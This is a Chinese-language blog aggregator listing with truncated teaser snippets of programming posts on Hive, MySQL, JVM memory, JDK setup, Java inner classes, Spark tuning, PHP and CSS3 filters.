  • hive 数据插入DML语法汇总 daizj hiveDML数据插入
    Hive的数据插入DML语法汇总1、Loading files into tables语法:1) LOAD DATA [LOCAL] INPATH 'filepath' [OVERWRITE] INTO TABLE tablename [PARTITION (partcol1=val1, partcol2=val2 ...)]解释:1)、上面命令执行环境为hive客户端环境下: hive>l
  • 工厂设计模式 dcj3sjt126com 设计模式
      使用设计模式是促进最佳实践和良好设计的好办法。设计模式可以提供针对常见的编程问题的灵活的解决方案。 工厂模式 工厂模式(Factory)允许你在代码执行时实例化对象。它之所以被称为工厂模式是因为它负责“生产”对象。工厂方法的参数是你要生成的对象对应的类名称。 Example #1 调用工厂方法(带参数) <?phpclass Example{ 
  • mysql字符串查找函数 dcj3sjt126com mysql
      FIND_IN_SET(str,strlist) 假如字符串str 在由N 子链组成的字符串列表strlist 中,则返回值的范围在1到 N 之间。一个字符串列表就是一个由一些被‘,’符号分开的自链组成的字符串。如果第一个参数是一个常数字符串,而第二个是type SET列,则   FIND_IN_SET() 函数被优化,使用比特计算。如果str不在strlist 或st
  • jvm内存管理 easterfly jvm
    一、JVM堆内存的划分 分为年轻代和年老代。年轻代又分为三部分:一个eden,两个survivor。 工作过程是这样的:e区空间满了后,执行minor gc,存活下来的对象放入s0, 对s0仍会进行minor gc,存活下来的的对象放入s1中,对s1同样执行minor gc,依旧存活的对象就放入年老代中; 年老代满了之后会执行major gc,这个是stop the word模式,执行
  • CentOS-6.3安装配置JDK-8 gengzg centos
    JAVA_HOME=/usr/java/jdk1.8.0_45 JRE_HOME=/usr/java/jdk1.8.0_45/jre PATH=$PATH:$JAVA_HOME/bin:$JRE_HOME/bin CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JRE_HOME/lib export JAVA_HOME
  • 【转】关于web路径的获取方法 huangyc1210 Web路径
    假定你的web application 名称为news,你在浏览器中输入请求路径:  http://localhost:8080/news/main/list.jsp  则执行下面向行代码后打印出如下结果:  1、 System.out.println(request.getContextPath()); //可返回站点的根路径。也就是项
  • php里获取第一个中文首字母并排序 远去的渡口 数据结构PHP
    很久没来更新博客了,还是觉得工作需要多总结的好。今天来更新一个自己认为比较有成就的问题吧。 最近在做储值结算,需求里结算首页需要按门店的首字母A-Z排序。我的数据结构原本是这样的: Array ( [0] => Array ( [sid] => 2885842 [recetcstoredpay] =&g
  • java内部类 hm4123660 java内部类匿名内部类成员内部类方法内部类
          在Java中,可以将一个类定义在另一个类里面或者一个方法里面,这样的类称为内部类。内部类仍然是一个独立的类,在编译之后内部类会被编译成独立的.class文件,但是前面冠以外部类的类名和$符号。内部类可以间接解决多继承问题,可以使用内部类继承一个类,外部类继承一个类,实现多继承。      &nb
  • Caused by: java.lang.IncompatibleClassChangeError: class org.hibernate.cfg.Exten zhb8015
    maven pom.xml关于hibernate的配置和异常信息如下,查了好多资料,问题还是没有解决。只知道是包冲突,就是不知道是哪个包....遇到这个问题的分享下是怎么解决的。。   maven pom:   <dependency> <groupId>org.hibernate</groupId> <ar
  • Spark 性能相关参数配置详解-任务调度篇 Stark_Summer sparkcachecpu任务调度yarn
    随着Spark的逐渐成熟完善, 越来越多的可配置参数被添加到Spark中来, 本文试图通过阐述这其中部分参数的工作原理和配置思路, 和大家一起探讨一下如何根据实际场合对Spark进行配置优化。   由于篇幅较长,所以在这里分篇组织,如果要看最新完整的网页版内容,可以戳这里:http://spark-config.readthedocs.org/,主要是便
  • css3滤镜 wangkeheng htmlcss
    经常看到一些网站的底部有一些灰色的图标,鼠标移入的时候会变亮,开始以为是js操作src或者bg呢,搜索了一下,发现了一个更好的方法:通过css3的滤镜方法。 html代码: <a href='' class='icon'><img src='utv.jpg' /></a> css代码: .icon{-webkit-filter: graysc
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他